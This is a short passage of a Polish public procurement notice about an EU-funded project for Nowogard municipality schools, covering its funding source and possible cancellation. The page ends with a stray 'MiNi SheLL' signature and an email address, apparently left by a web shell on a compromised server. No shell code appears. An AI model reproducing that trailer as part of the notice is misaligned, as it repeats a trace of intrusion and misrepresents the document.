<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Szkoły nowogardzkiej gminy na edukacyjne wyżyny, nr UDA-POKL.09.01.02-32-249/12-00. Zamówienie dofinansowane ze środków UE w ramach Europejskiego Funduszu Społecznego Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com